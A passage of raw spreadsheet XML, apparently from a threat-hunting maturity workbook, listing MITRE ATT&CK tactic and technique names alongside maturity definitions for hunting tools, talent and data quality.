  <c r="K211" i="4" s="1"/>
  <c r="G211" i="4" s="1"/>
  <c r="L19" i="1" s="1"/>
  <c r="H11" i="4"/>
  <c r="K11" i="4" s="1"/>
  <c r="G11" i="4" s="1"/>
  <c r="J3" i="1" s="1"/>
  <c r="H57" i="4"/>
  <c r="K57" i="4" s="1"/>
  <c r="G57" i="4" s="1"/>
  <c r="H190" i="4"/>
  <c r="K190" i="4" s="1"/>
  <c r="G190" i="4" s="1"/>
  <c r="V2" i="1" s="1"/>
  <c r="H80" i="4"/>
  <c r="K80" i="4" s="1"/>
  <c r="G80" i="4" s="1"/>
  <c r="T11" i="1" s="1"/>
  <c r="H27" i="4"/>
  <c r="K27" i="4" s="1"/>
  <c r="G27" i="4" s="1"/>
  <c r="T10" i="1" s="1"/>
  <c r="H180" i="4"/>
  <c r="K180" i="4" s="1"/>
  <c r="G180" i="4" s="1"/>
  <c r="H119" i="4"/>
  <c r="K119" i="4" s="1"/>
  <c r="G119" i="4" s="1"/>
  <c r="H59" i="4"/>
  <c r="K59" i="4" s="1"/>
  <c r="G59" i="4" s="1"/>
  <c r="B37" i="1" s="1"/>
  <c r="H70" i="4"/>
  <c r="K70" i="4" s="1"/>
  <c r="G70" i="4" s="1"/>
  <c r="J8" i="1" s="1"/>
  <c r="H126" i="4"/>
  <c r="K126" i="4" s="1"/>
  <c r="G126" i="4" s="1"/>
  <c r="P12" i="1" s="1"/>
  <c r="H188" i="4"/>
  <c r="K188" i="4" s="1"/>
  <c r="G188" i="4" s="1"/>
  <c r="H19" i="1" s="1"/>
  <c r="H20" i="4"/>
  <c r="K20" i="4" s="1"/>
  <c r="G20" i="4" s="1"/>
  <c r="B40" i="1" s="1"/>
  <c r="H104" i="4"/>
  <c r="K104" i="4" s="1"/>
  <c r="G104" i="4" s="1"/>
  <c r="H210" i="4"/>
  <c r="K210" i="4" s="1"/>
  <c r="G210" i="4" s="1"/>
  <c r="B55" i="1" s="1"/>
  <c r="H145" i="4"/>
  <c r="K145" i="4" s="1"/>
  <c r="G145" i="4" s="1"/>
  <c r="F17" i="1" s="1"/>
  <c r="H105" i="4"/>
  <c r="K105" i="4" s="1"/>
  <c r="G105" i="4" s="1"/>
  <c r="T12" i="1" s="1"/>
  <c r="H84" i="4"/>
  <c r="K84" i="4" s="1"/>
  <c r="G84" i="4" s="1"/>
  <c r="J4" i="1" s="1"/>
  <c r="H21" i="4"/>
  <c r="K21" i="4" s="1"/>
  <c r="G21" i="4" s="1"/>
  <c r="R2" i="1" s="1"/>
  <c r="H81" i="4"/>
  <c r="K81" i="4" s="1"/>
  <c r="G81" i="4" s="1"/>
  <c r="L13" i="1" s="1"/>
  <c r="H173" i="4"/>
  <c r="K173" i="4" s="1"/>
  <c r="G173" i="4" s="1"/>
  <c r="T19" i="1" s="1"/>
  <c r="H181" i="4"/>
  <c r="K181" i="4" s="1"/>
  <c r="G181" i="4" s="1"/>
  <c r="B49" i="1" s="1"/>
  <c r="H22" i="4"/>
  <c r="K22" i="4" s="1"/>
  <c r="G22" i="4" s="1"/>
  <c r="L10" i="1" s="1"/>
  <c r="H176" i="4"/>
  <c r="K176" i="4" s="1"/>
  <c r="G176" i="4" s="1"/>
  <c r="L17" i="1" s="1"/>
  <c r="H169" i="4"/>
  <c r="K169" i="4" s="1"/>
  <c r="G169" i="4" s="1"/>
  <c r="B11" i="1" s="1"/>
  <c r="H38" i="4"/>
  <c r="K38" i="4" s="1"/>
  <c r="G38" i="4" s="1"/>
  <c r="H82" i="4"/>
  <c r="K82" i="4" s="1"/>
  <c r="G82" i="4" s="1"/>
  <c r="H7" i="1" s="1"/>
  <c r="H185" i="4"/>
  <c r="K185" i="4" s="1"/>
  <c r="G185" i="4" s="1"/>
  <c r="L18" i="1" s="1"/>
  <c r="H197" i="4"/>
  <c r="K197" i="4" s="1"/>
  <c r="G197" i="4" s="1"/>
  <c r="H64" i="4"/>
  <c r="K64" i="4" s="1"/>
  <c r="G64" i="4" s="1"/>
  <c r="J12" i="1" s="1"/>
  <c r="H40" i="4"/>
  <c r="K40" i="4" s="1"/>
  <c r="G40" i="4" s="1"/>
  <c r="P6" i="1" s="1"/>
  <c r="H15" i="4"/>
  <c r="K15" i="4" s="1"/>
  <c r="G15" i="4" s="1"/>
  <c r="F39" i="1" s="1"/>
  <c r="H154" i="4"/>
  <c r="K154" i="4" s="1"/>
  <c r="G154" i="4" s="1"/>
  <c r="N18" i="1" s="1"/>
  <c r="H50" i="4"/>
  <c r="K50" i="4" s="1"/>
  <c r="G50" i="4" s="1"/>
  <c r="J15" i="1" s="1"/>
  <c r="H166" i="4"/>
  <c r="K166" i="4" s="1"/>
  <c r="G166" i="4" s="1"/>
  <c r="H79" i="4"/>
  <c r="K79" i="4" s="1"/>
  <c r="G79" i="4" s="1"/>
  <c r="H8" i="4"/>
  <c r="K8" i="4" s="1"/>
  <c r="G8" i="4" s="1"/>
  <c r="J17" i="1" s="1"/>
  <c r="H18" i="4"/>
  <c r="K18" i="4" s="1"/>
  <c r="G18" i="4" s="1"/>
  <c r="L3" i="1" s="1"/>
  <c r="H198" i="4"/>
  <c r="K198" i="4" s="1"/>
  <c r="G198" i="4" s="1"/>
  <c r="H87" i="4"/>
  <c r="K87" i="4" s="1"/>
  <c r="G87" i="4" s="1"/>
  <c r="N10" i="1" s="1"/>
  <c r="H33" i="4"/>
  <c r="K33" i="4" s="1"/>
  <c r="G33" i="4" s="1"/>
  <c r="T15" i="1" s="1"/>
  <c r="H71" i="4"/>
  <c r="K71" i="4" s="1"/>
  <c r="G71" i="4" s="1"/>
  <c r="F24" i="1" s="1"/>
  <c r="H98" i="4"/>
  <c r="K98" i="4" s="1"/>
  <c r="G98" i="4" s="1"/>
  <c r="L7" i="1" s="1"/>
  <c r="H39" i="4"/>
  <c r="K39" i="4" s="1"/>
  <c r="G39" i="4" s="1"/>
  <c r="H139" i="4"/>
  <c r="K139" i="4" s="1"/>
  <c r="G139" i="4" s="1"/>
  <c r="H129" i="4"/>
  <c r="K129" i="4" s="1"/>
  <c r="G129" i="4" s="1"/>
  <c r="B26" i="1" s="1"/>
  <c r="H68" i="4"/>
  <c r="K68" i="4" s="1"/>
  <c r="G68" i="4" s="1"/>
  <c r="B7" i="1" s="1"/>
  <c r="H121" i="4"/>
  <c r="K121" i="4" s="1"/>
  <c r="G121" i="4" s="1"/>
  <c r="J7" i="1" s="1"/>
  <c r="H69" i="4"/>
  <c r="K69" i="4" s="1"/>
  <c r="G69" i="4" s="1"/>
  <c r="H142" i="4"/>
  <c r="K142" i="4" s="1"/>
  <c r="G142" i="4" s="1"/>
  <c r="H10" i="1" s="1"/>
  <c r="H186" i="4"/>
  <c r="K186" i="4" s="1"/>
  <c r="G186" i="4" s="1"/>
  <c r="P13" i="1" s="1"/>
  <c r="H2" i="4"/>
  <c r="K2" i="4" s="1"/>
  <c r="F2" i="3" l="1"/>
  <c r="L2" i="3"/>
  <c r="B2" i="3"/>
  <c r="B24" i="1"/>
  <c r="L5" i="1"/>
  <c r="B4" i="1"/>
  <c r="D4" i="1"/>
  <c r="B47" i="1"/>
  <c r="N27" i="1"/>
  <c r="F41" i="1"/>
  <c r="N16" i="1"/>
  <c r="B41" i="1"/>
  <c r="N21" i="1"/>
  <c r="N32" i="1"/>
  <c r="F59" i="1"/>
  <c r="N22" i="1"/>
  <c r="F45" i="1"/>
  <c r="D15" i="1"/>
  <c r="B29" i="1"/>
  <c r="N24" i="1"/>
  <c r="L16" i="1"/>
  <c r="F43" i="1"/>
  <c r="N19" i="1"/>
  <c r="K2" i="3"/>
  <c r="D10" i="1"/>
  <c r="L4" i="1"/>
  <c r="H8" i="1"/>
  <c r="F14" i="1"/>
  <c r="N3" i="1"/>
  <c r="B5" i="1"/>
  <c r="D5" i="1"/>
  <c r="F52" i="1"/>
  <c r="N29" i="1"/>
  <c r="N11" i="1"/>
  <c r="F35" i="1"/>
  <c r="N15" i="1"/>
  <c r="D17" i="1"/>
  <c r="D18" i="1"/>
  <c r="B35" i="1"/>
  <c r="D16" i="1"/>
  <c r="F34" i="1"/>
  <c r="B30" i="1"/>
  <c r="B3" i="1"/>
  <c r="D3" i="1"/>
  <c r="N12" i="1"/>
  <c r="F37" i="1"/>
  <c r="F18" i="1"/>
  <c r="B16" i="1"/>
  <c r="E2" i="3"/>
  <c r="D8" i="1"/>
  <c r="B12" i="1"/>
  <c r="F12" i="1"/>
  <c r="D22" i="1"/>
  <c r="F46" i="1"/>
  <c r="B42" i="1"/>
  <c r="N8" i="1"/>
  <c r="F26" i="1"/>
  <c r="N14" i="1"/>
  <c r="F40" i="1"/>
  <c r="F4" i="1"/>
  <c r="D6" i="1"/>
  <c r="D23" i="1"/>
  <c r="B43" i="1"/>
  <c r="F2" i="1"/>
  <c r="D2" i="1"/>
  <c r="B13" i="1"/>
  <c r="D9" i="1"/>
  <c r="F60" i="1"/>
  <c r="N33" i="1"/>
  <c r="D12" i="1"/>
  <c r="B19" i="1"/>
  <c r="F38" i="1"/>
  <c r="N13" i="1"/>
  <c r="T13" i="1"/>
  <c r="L9" i="1"/>
  <c r="B9" i="1"/>
  <c r="F7" i="1"/>
  <c r="B27" i="1"/>
  <c r="D14" i="1"/>
  <c r="F51" i="1"/>
  <c r="N28" i="1"/>
  <c r="I2" i="3"/>
  <c r="J2" i="3"/>
  <c r="G2" i="4"/>
  <c r="T8" i="1" s="1"/>
  <c r="G2" i="3"/>
  <c r="H2" i="3"/>
  <c r="D2" i="3"/>
  <c r="C2" i="3"/>
  <c r="F53" i="1"/>
  <c r="B52" i="1"/>
  <c r="B39" i="1"/>
  <c r="D20" i="1"/>
  <c r="B48" i="1"/>
  <c r="H18" i="1"/>
  <c r="D25" i="1"/>
  <c r="H9" i="1"/>
  <c r="P10" i="1"/>
  <c r="F11" i="1"/>
  <c r="D7" i="1"/>
  <c r="D26" i="1"/>
  <c r="F48" i="1"/>
  <c r="D11" i="1"/>
  <c r="B15" i="1"/>
  <c r="N25" i="1"/>
  <c r="F47" i="1"/>
  <c r="B22" i="1"/>
  <c r="D13" i="1"/>
  <c r="T21" i="1"/>
  <c r="B54" i="1"/>
  <c r="F56" i="1"/>
  <c r="N9" i="1"/>
  <c r="B20" i="1"/>
  <c r="F27" i="1"/>
  <c r="B53" i="1"/>
  <c r="F54" i="1"/>
  <c r="F49" i="1"/>
  <c r="D28" i="1"/>
  <c r="B51" i="1"/>
  <c r="N2" i="1"/>
  <c r="L2" i="1"/>
  <c r="F8" i="1"/>
  <c r="B10" i="1"/>
  <c r="B50" i="1"/>
  <c r="D27" i="1"/>
  <c r="N20" i="1"/>
  <c r="L14" i="1"/>
  <c r="F36" i="1"/>
  <c r="B32" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1980" uniqueCount="1217">
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>.bash_profile and .bashrc</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>Audio Capture</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Commonly Used Port</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>Application Deployment Software</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>Data Compressed</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>Exploitation of Vulnerability</t>
  </si>
  <si>
    <t>Command-Line Interface</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Data Encrypted</t>
  </si>
  <si>
    <t>Connection Proxy</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Network Service Scanning</t>
  </si>
  <si>
    <t>Logon Scripts</t>
  </si>
  <si>
    <t>Execution through API</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>Custom Command and Control Protocol</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Credential Dumping</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>Execution through Module Load</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>Custom Cryptographic Protocol</t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>Credentials in Files</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>Graphical User Interface</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>Exfiltration Over Command and Control Channel</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>Change Default File Association</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>InstallUtil</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>Remote File Copy</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Disabling Security Tools</t>
  </si>
  <si>
    <t>Input Prompt</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Multiband Communication</t>
  </si>
  <si>
    <t>Cron Job</t>
  </si>
  <si>
    <t>File System Permissions Weakness</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Replication Through Removable Media</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>Multilayer Encryption</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>Shared Webroot</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>Local Port Monitor</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Man in the Browser</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>New Service</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>Third-party Software</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>Standard Application Layer Protocol</t>
  </si>
  <si>
    <t>Path Interception</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>Two-Factor Authentication Interception</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>Windows Admin Shares</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>Standard Cryptographic Protocol</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>Plist Modification</t>
  </si>
  <si>
    <t>File System Logical Offsets</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>Scripting</t>
  </si>
  <si>
    <t>Standard Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Hypervisor rootkit</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>Uncommonly Used Port</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>Hooking</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>SSH Hijacking</t>
  </si>
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>Hidden Users</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>Password Discovery Policy</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>Space after Filename</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>Startup Items</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>Sudo</t>
  </si>
  <si>
    <t>HISTCONTROL</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>Trap</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t>Trusted Developer Utilities</t>
  </si>
  <si>
    <t>Login Item</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>Modify Existing Service</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>LC_MAIN Hijacking</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>Sudo Caching</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>Control Panel Items</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>Rc.common</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>Redundant Access</t>
  </si>
  <si>
    <t>NTFS Extended Attributes</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution</t>
  </si>
  <si>
    <t>Registry Run Keys / Start Folder</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>Service Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Shortcut Modification</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>Time Providers</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>DCShadow</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>Technology</t>
  </si>
  <si>
    <t>Talent</t>
  </si>
  <si>
    <t>Data Quality</t>
  </si>
  <si>
    <t>Definition</t>
  </si>
  <si>
    <t>Score #</t>
  </si>
  <si>
    <t xml:space="preserve">Hunt Tool </t>
  </si>
  <si>
    <t>Skills + Intuition + Institutional Knowledge</t>
  </si>
  <si>
    <t>Completeness</t>
  </si>
  <si>
    <t>Timeliness</t>
  </si>
  <si>
    <t>Consistency</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">I don’t know what tools I have or need in order to start hunting. Not documentation available. Most likely you dont even have a SIEM to centralize your data. 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="18"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t/>
    </r>
  </si>
  <si>
    <t>A team might not even exist or you might have the talent but without previous experience, tools,  or training for hunting.
You might be recruting people at this stage.
A repository of specific techniques to hunt for specific adversaries might not exist at this point.
Hunting procedures might not even be documented.</t>
  </si>
  <si>
    <t>don’t know / not documented</t>
  </si>
  <si>
    <t>Poor</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">The right technology is present to help centralize your data across several other tools (Splunk, ELK, EDR, etc).
Tools allowing you to run basic queries in order to make sense of the data without automation,reducing the efficiency and effectiveness of your hunt(i.e Running a few queries returns still thousands and thousands of events that your team will still need to go through manually).
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>Your team focuses only on creating signatures or basic correlation rules to detect IOCs from intel reports. 
First hunting procedures get documented (Plenty of time to do this since at this level your team might not have the right tools or required data to event start hunting effectively). Also, here is where you might have Threat Intel feeds helping your routine hunts (IOC Sweeps)</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Endpoint Coverage </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">- required data source is available from  0 - 25% of your network endpoints.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Missing Data </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">- Required data (values or fields) is missing 75%-100%.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Data Retention</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data is retained 0-25% of the time needed or defined by the organization.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Timezones - </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Original timezone identified in data (Local or UTC)
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Ingestion vs Creation - </t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Ingestion time only automatically generated</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Standard Field Names</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data field names standardized only 0-25% across all data sources.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Standard Field Types</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - Required data field types standardized only 0-25% across all data sources.
</t>
    </r>
  </si>
  <si>
    <t>Fair</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Without the right tools or processes to aggregate and make sense of all the data, your team might not be effective yet after automating a few rules/queries. Hunters might be running queries and still get a very high amount of events that still need to be analyzed. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Tools collecting/integrating the right data (NOT JUST MORE DATA) to improve the detection of an adversary technique.</t>
    </r>
  </si>
  <si>
    <t>Your team starts documenting or obtaining information about the network (starting with High Value Targets maybe?).
Your team identifies a framework to start categorizing TTPs (MITRE ATT&amp;CK) and starts exploring the data.
Basic hunting procedures are documented (i.e queries)</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Endpoint Coverage</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> - required data source is available from  25 - 50% of your network endpoints.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Missing Data</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
